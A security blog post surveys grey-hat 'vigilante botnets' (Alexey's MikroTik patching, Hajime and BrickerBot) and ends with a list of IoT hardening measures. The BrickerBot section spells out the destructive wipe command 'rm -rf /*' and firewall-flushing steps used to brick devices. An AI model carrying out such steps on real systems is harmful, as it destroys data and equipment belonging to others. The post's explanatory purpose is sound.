Based in silicon valley, california, security brief is a blog by chris louie. his posts discuss current information security affairs

I AM THE CURE: Vigilante Botnets

I AM THE CURE: Vigilante Botnets

In my freshman (first) year of college (university), I took an introductory course entitled “Ethics of Engineering”. This course was supposed to expose budding engineers to ethical dilemmas that had no right answer.  For example the Space Shuttle Colombia disaster was partially the result of changing the chemical composition of the shuttle’s fuel tanks to conform to US Environmental Protection Agency (EPA) Standards, but as a result weakening them and making them more prone to failure.   However, in a somewhat twist of irony, our professor told us in a braggadocious manor that he and his firm defrauded the US Department of Defense by using sub-par materials to fulfill a contract for the US Navy.  The ethics of any field (medicine, engineering, cyberwarfare, etc.) are always changing as circumstances change and a new generation of grey-hat hacker is emerging, bringing questions of ethics, morals, and the greater good.

Computer hacking is typically separated into two separate and opposing groups: white hats and black hats.  This distinction is an artifact from old spaghetti western movies where the protagonists typically wore literal white hats and antagonists wore literal black hats. White hat hackers specialize in penetration testing and other security research methodologies with good intentions and with the permission from their targets to conduct the testing.  On the opposite side of the spectrum, black hats attack systems without their owners’ permission, often illegally, and with malicious intent in mind.  Over time, a new category of hacker emerged where security researchers accessed systems without authorization (black hat), but to expose dangerous vulnerabilities for the greater good and no personal gain (white hat).  The term "grey hat" hacker was born.  A hacker gaining unauthorized access to a charity’s computer network with the sole intention to inform them of an exposed vulnerability so they can patch it would be considered grey hat hacking.  Sylvester Stallone famously opined the phrase “You’re the disease and I’m the cure” [NSFW language and violence in the link] before blowing away a hostage taker in the 1986 hit film Cobra.  

Vulnerable IoT devices pose a serious problem to the internet at large by acting as the infrastructure needed to bring down companies or large sections of the internet.  The following are examples of grey hat hackers creating vigilante botnets designed to protect the internet (the cure).


Over the last few weeks, a Russian grey hat hacker has been patching vulnerable MikroTik routers.  This past April, MikroTik released a patch to fix a critical vulnerability that allowed outside attackers to gain unauthorized access to the over two million MikroTik routers in use around the world.  While MikroTik was able to create and make a patch available to close the vulnerabilities, routers do not self-update and cybercriminals took full advantage of this to begin planting malware on MikroTik routers.  Malware payloads include cryptomining malware, DNS poisoning attacks to steal banking credentials, TLS strip for HTTP interception/injection, and remote access trojans (RATs).  Considering MikroTik routers are most commonly in use by consumers and Small Office / Home Office (SOHO), organizations that lack IT departments and information security personnel, it is highly likely that most affected routers have not yet been updated to a version of the software that closes the vulnerability and data from Shodan appears to support this.  

A hacker who goes by the handle Alexey posted on a Russian blog site that he has been gaining unauthorized access to vulnerable MikroTik routers and updating the settings on them to prevent other attackers from gaining unauthorized access and deploying a malicious payload.  He simply runs a script to add basic firewall rules and prevent management access to the router from the outside (best security practices).  At the time of writing, over 100,000 vulnerable routers have been updated.  Despite Alexey’s good intentions, it is still illegal to access another person’s equipment without their consent.  Alexey opened up a Telegram channel at @router_os to collect feedback and so far, it has been overwhelmingly negative.


The Hajime vigilante botnet hit the internet in early 2017 after the Mirai botnet took down DynDNS and many of their customers including Netflix, Twitter and Amazon Web Services.  Hajime spreads like the Mirai botnet using well known vulnerabilities such as open telnet ports and hard coded default credentials.  Once a device is infected, Hajime closes the backdoors, such as listening telnet ports.  Command and control traffic is handled by a peer-to-peer network making an ISP takedown much more difficult.  Unlike malicious botnets like Mirai and Satori, Hajime lacks DDoS capabilities, hacking tools, and persistence mechanisms.  Simply rebooting the device will erase all traces of Hajime, leaving it exposed with backdoors, listening telnet ports, and hard coded credentials.  For devices with a display screen such as a printer or coffee maker, the author programmed a message informing the user that their device was vulnerable and it has now been secured.

The Hajime botnet made a resurgence in April 2018 when it was reconfigured and updated to include vulnerable MikroTik routers as targets for the botnet.


Another strain of vigilante botnet was discovered in April 2017.  Like Hajime, BrickerBot attacks vulnerable IoT devices using well known vulnerabilities and hard coded credentials.  The Author, who goes by the handle Janit0r, states that vulnerable IoT devices are cancer to the internet.  After viewing Mirai take down security blog Krebs on Security and DynDNS in a seemingly indiscriminate fashion, Janit0r though the IoT industry would have no choice but to respond with security solutions to stop future attacks.  After seeing no movement from IoT device manufacturers, Janit0r took matters into his own hands and created BrickerBot. Janit0r viewed BrickerBot as chemotherapy for the cancer that is IoT.  While chemotherapy is a very harsh treatment and no healthy human being should voluntarily go through it, for cancer patients it is the lesser of two evils.  He believed having millions of vulnerable and infected IoT devices on the internet was making it seriously ill and moderate remedies (such as Hajime) were ineffective. Once a device is infected with BrickerBot, the device is instructed to remove the default gateway, wipe the device through rm -rf /* and limit the maximum number of kernel threads to one. The iptables firewall and NAT rules are flushed and a rule is added to drop all outgoing packets.  Two new security slang terms were born from this malware:

  • PDoS: Persistent Denial of Service

  • Phlashing: the act of PDoSing a device

While there is no single solution to IoT security and grey hat hackers are taking matters into their own hands, there are solutions emerging that should greatly assist with the vulnerable device problem.  

IoT security solutions wish list:

  1. Devices manufactured without bugs or vulnerabilities

  2. Disable remote management access by default

  3. Top-down secure IoT platform

  4. Hard coded passwords must be unique per device

  5. Hard coded passwords that are not unique must be changed upon first use

  6. Auto-update devices by default

  7. Require digital signature for firmware and software updates

  8. Firewall rules to close unnecessary ports

  9. Web proxy to inspect traffic for malicious data, command and control traffic

  10. RFC3514

The Problem With Abandoned Domains

The Problem With Abandoned Domains

Good Enough Security Redux: SSL Inspection Devices Can Make Networks Less Secure

Good Enough Security Redux: SSL Inspection Devices Can Make Networks Less Secure